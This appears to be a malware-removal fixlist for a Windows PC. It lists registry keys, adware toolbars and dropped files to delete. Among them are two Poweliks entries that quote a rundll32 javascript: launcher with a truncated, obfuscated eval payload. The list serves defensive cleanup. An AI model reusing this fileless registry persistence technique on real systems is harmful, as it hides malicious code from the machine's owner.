cmd: tskill dllhost.exe /A HKLM\...\Run: [] => [X] HKU\S-1-5-21-3649128416-2311760161-3228670520-1000\...\Run: [ChromeUpdate] => C:\Users\Jennifer\AppData\Roaming\FrameworkUpdate7\ChromeUpdate.exe [15082858 2014-11-08] (Company name goes here) HKU\S-1-5-21-3649128416-2311760161-3228670520-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1 HKU\S-1-5-21-3649128416-2311760161-3228670520-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! URLSearchHook: HKLM - (No Name) - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} - No File URLSearchHook: HKCU - (No Name) - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} - No File SearchScopes: HKLM - {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = http://search.condui...&ctid=CT2260173 SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKCU - {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = SearchScopes: HKCU - {afdbddaa-5d3f-42ee-b79c-185a7020515b} URL = BHO: No Name -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> No File BHO: No Name -> {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} -> No File BHO: No Name -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> No File Toolbar: HKLM - No Name - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} - No File Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File Toolbar: HKCU - No Name - {8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} - No File S2 Update AtuZi; "C:\Program Files\AtuZi\updateAtuZi.exe" [X] 2014-11-08 17:08 - 2014-11-08 19:31 - 00000424 _____ () C:\ProgramData\@system.temp 2014-11-08 17:08 - 2014-11-08 19:31 - 00000160 ____H () C:\ProgramData\@system3.att 2014-11-08 17:07 - 2014-11-08 17:07 - 00000448 ____H () C:\Users\Jennifer\AppData\Roaming\麽鎒駓覜 2014-11-08 17:07 - 2014-11-08 17:07 - 00000000 ____D () C:\Users\Jennifer\AppData\Roaming\FrameworkUpdate7 2014-11-08 17:06 - 2014-11-08 17:07 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage CustomCLSID: HKU\S-1-5-21-3649128416-2311760161-3228670520-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\Jennifer\AppData\Local\Conduit\Community Alerts\Alert.dll (ClientConnect Ltd.) CustomCLSID: HKU\S-1-5-21-3649128416-2311760161-3228670520-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? EmptyTemp: